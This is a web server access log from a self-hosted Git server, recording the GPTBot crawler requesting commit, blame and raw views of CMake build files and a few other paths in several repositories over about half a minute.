"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:16:49:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11183] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:16:49:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10006] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:16:49:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10005] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:16:49:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10006] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:16:49:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10004] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:16:49:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10007] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:16:49:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10206] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:16:49:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10203] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:16:49:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10205] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:16:49:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10205] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:16:49:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10206] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:16:49:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10020] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:16:49:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10018] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:16:49:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10018] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:16:49:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 449] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:16:49:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 449] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:16:49:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 449] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:16:49:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 449] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:16:49:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 224] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:16:49:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 224] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:16:49:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 224] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:16:49:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 224] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:16:49:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 224] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:16:50:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:50:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 10241] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:50:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 10242] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:50:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 9966] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:50:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 10243] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:50:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 10239] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:50:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13184] [Gzip 4.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:50:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13185] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:50:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13185] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:50:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13183] [Gzip 4.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:50:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13187] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:50:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 552] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:16:50:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11373] [Gzip 4.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:16:50:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11857] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:50:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/.gitignore?display=source" [Client 74.7.227.38] [Length 11701] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/.gitignore" +[17/Feb/2026:16:50:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/vite.config.ts?display=rendered" [Client 74.7.227.38] [Length 11101] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/vite.config.ts" +[17/Feb/2026:16:50:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3?display=rendered" [Client 74.7.227.38] [Length 11019] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3" +[17/Feb/2026:16:50:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 10011] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:16:50:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 10013] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:16:50:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 10014] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:16:50:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 10012] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:16:50:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 10010] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:16:50:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13923] [Gzip 8.77] [Sent-to 192.168.0.250] 